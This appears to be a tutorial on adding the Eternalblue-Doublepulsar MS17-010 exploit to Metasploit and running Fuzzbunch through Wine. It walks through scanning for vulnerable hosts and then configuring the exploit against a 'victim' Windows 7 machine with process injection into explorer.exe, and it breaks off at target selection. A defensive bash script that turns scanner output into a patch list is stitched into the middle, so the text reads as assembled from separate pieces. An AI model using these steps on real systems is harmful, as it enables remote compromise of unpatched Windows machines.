This tutorial covers how to add Eternalblue-Doublepulsar to the Metasploit Framework on any Debian-based distro, and how to run the Fuzzbunch framework through Wine.
Debian based distro
Will the target fall victim?
We want to check whether the target is vulnerable. To do this we need to add a module to Metasploit. Specifically, we want the MS17-010 module, which we can find on Exploit-DB. Download the file and move it into Metasploit's scanner modules.
cp *.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/smb/smb_ms_17_010.rb
Now start up Metasploit and let's test everything out.
Let's make sure our new module loaded.
Now use the module by entering the following.
There will be a few requirements for this to work. To list them all enter the following.
Here we really just need to set the value of RHOSTS.
set RHOSTS <IP address or addresses>
If the machine is likely vulnerable you will see something like this.
[!] 192.168.0.100:445 -Host is likely VULNERABLE to MS17-010!
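For a defender running this scanner across their own address space, the flagged lines are the patch queue. The script below is an added example, not part of the original tutorial: it reads saved scanner output and prints each flagged host once. The function names and every sample line other than the "likely VULNERABLE" format shown above are assumptions constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example (not from the tutorial): build a patch list from scanner output.

# Constructed sample log. Only the "likely VULNERABLE" line format appears on
# the page; the other lines are assumed filler a saved scan log might contain.
sample_scan_output() {
cat <<'EOF'
[!] 192.168.0.100:445 -Host is likely VULNERABLE to MS17-010!
[-] 192.168.0.101:445 - Host does NOT appear vulnerable.
[!] 192.168.0.102:445 - Host is likely VULNERABLE to MS17-010!
[!] 192.168.0.100:445 -Host is likely VULNERABLE to MS17-010!
[*] Scanned 3 of 3 hosts (100% complete)
EOF
}

# Read scanner output on stdin; print each flagged IPv4 address once,
# sorted numerically by octet. Tolerates "-Host" and " - Host" spacing.
ms17010_patch_list() {
    grep -F 'likely VULNERABLE to MS17-010' |
        grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}:[0-9]+' |
        cut -d: -f1 |
        sort -u -t. -k1,1n -k2,2n -k3,3n -k4,4n
}

# Summarise the list. Returns 1 while any host is still flagged, so a
# scheduled job can fail until the MS17-010 update has been applied.
ms17010_report() {
    hosts=$(ms17010_patch_list) || true
    if [ -z "$hosts" ]; then
        echo "No hosts flagged for MS17-010."
        return 0
    fi
    count=$(printf '%s\n' "$hosts" | wc -l | tr -d ' ')
    echo "$count host(s) still need the MS17-010 update:"
    printf '  %s\n' $hosts
    return 1
}

# Demo on the constructed sample; "|| true" keeps the script's exit status 0.
sample_scan_output | ms17010_report || true
```

Pipe a saved scan log into `ms17010_report` in place of the sample to get the same summary for real output.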
The next step is to clone Eternalblue-Doublepulsar-Metasploit from GitHub. We could add it to Metasploit's path as we did before, by copying it directly into the Metasploit installation. Here, however, we will add it the preferred way.
Metasploit prefers external modules to be placed in .msf4/modules, found in the root user's home directory. We will need to make a few directories for our purpose, such as exploits/windows.
Clone Eternalblue-Doublepulsar-Metasploit into this directory.
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Change into Eternalblue-Doublepulsar-Metasploit.
Now copy eternalblue_doublepulsar.rb to the appropriate directory.
cp eternalblue_doublepulsar.rb /root/.msf4/modules/exploits/windows/smb/
We need to install wine because Fuzzbunch was written for Windows.
As always, we begin with an update.
Install Wine and other Wine tools
apt install wine winbind winetricks
We need to add the 32-bit (i386) architecture because Fuzzbunch was written for Windows XP.
dpkg --add-architecture i386
Update and install Wine32
apt-get update && apt-get install wine32
Set Path variable.
Set Wine Architecture
WINEARCH=win32 wine wineboot
Add to bashrc
echo "export WINEPREFIX=$HOME/.wine" >> ~/.bashrc
With everything set up, it's time to exploit our victim. Begin by starting Metasploit.
Use our new module. Pro tip: Tab is your friend.
We will need to set the path to Doublepulsar and Eternalblue.
set DOUBLEPULSAR ~/.msf4/modules/exploits/windows/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUE ~/.msf4/modules/exploits/windows/Eternalblue-Doublepulsar-Metasploit/deps
I recommend setting the process injection to explorer.exe.
set PROCESSINJECT explorer.exe
Set RHOST to the victim's IP address.
set RHOST <>
We want to make sure we are targeting the right version of Windows.
We are attacking Windows 7, so enter the corresponding number.
set target <>